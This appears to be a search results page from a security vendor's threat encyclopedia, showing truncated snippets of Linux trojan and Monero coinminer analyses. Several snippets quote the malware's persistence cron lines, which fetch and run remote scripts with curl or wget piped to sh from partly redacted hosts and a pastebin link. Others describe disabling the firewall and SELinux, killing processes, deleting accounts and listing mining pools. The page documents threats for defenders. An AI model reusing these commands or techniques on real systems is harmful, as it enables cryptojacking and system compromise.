Search
Keyword: usojan.sh.malxmr.uweki2
40554 Total Search |
Showing Results : 1 - 20
persistence: Path: /var/spool/cron/crontabs/ Schedule: Every 30 minutes Command: */30 * * * * sh /etc/newsvc.sh >/dev/null 2>&1 Disables Firewall Deletes the following user accounts: akay vfinder Stops
/usr/bin/crontab /var/spool/cron/{user} crontab content: */10 * * * * sh (/etc/update.sh or /tmp/update.sh) >/dev/null 2>&1 disables SELINUX Clear PageCaches Renames the following files: /usr/bin/wgen to
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
}/config.json It creates the following cron job to enable automatic execution of update.sh: Path: '/var/spool/cron/crontabs/'"$USER" Schedule: Every 30 minutes Command: */30 * * * * sh {directory}/update.sh
threads -v, --av=N algorithm variation, 0 auto select --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 --cpu-priority set process priority (0 idle, 2 normal to 5 highest)
/var/spool/cron/root Content: */12 * * * * curl -fsSL http://w.{BLOCKED}i.xyz:43768/crontab.sh | sh mine.moneropool.com xmr.crypto-pool.fr monerohash.com xmrpool.eu pool.noobxmr.com pool.minexmr.cn xmr.poolto.be
/tmp/.vd/sslm.tgz min* {Current Directory}/min* /tmp/min* Process Termination This Trojan terminates the following processes if found running in the affected system's memory: rand rx rd tsm tsm2 haiduc a sparky sh
* * * * curl -fsSL http://w.{BLOCKED}i.xyz:43768/crontab.sh | sh It blocks all outgoing SSH connections on the following ports: 3333 5555 7777 9999 14444 It modifies the system's HOSTS files to prevent users
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Coinminer arrives on a system as
following cron jobs for persistence: Path: /var/spool/con/crontabs/root Schedule: Every minute Command: wget -q -O - http://{BLOCKED}.{BLOCKED}.169.247/cr2.sh | sh > /dev/null 2>&1
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Coinminer arrives on a system as
This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
'/var/spool/cron/crontabs/'"$USER" Schedule: Every 15 minutes Command: "*/15 * * * * ((wget -q -O- https://pastebin.com/raw/{BLOCKED}tb || curl -fsSL https://pastebin.com/raw/{BLOCKED}tb) | base64 -d) | sh" > cron.d 2>&1
enable automatic execution of the dropper component: Path: /var/spool/cron/crontab/root Trigger: Every 10 minutes Action: */10 * * * * sh {dropper component} >/dev/null 2>&1 Downloaded from the Internet,
-O - http://{BLOCKED}.{BLOCKED}.146.118 /unk.sh | sh > /dev/null 2>&1 Trojan:Linux/Shmusho!MSR(MICROSOFT)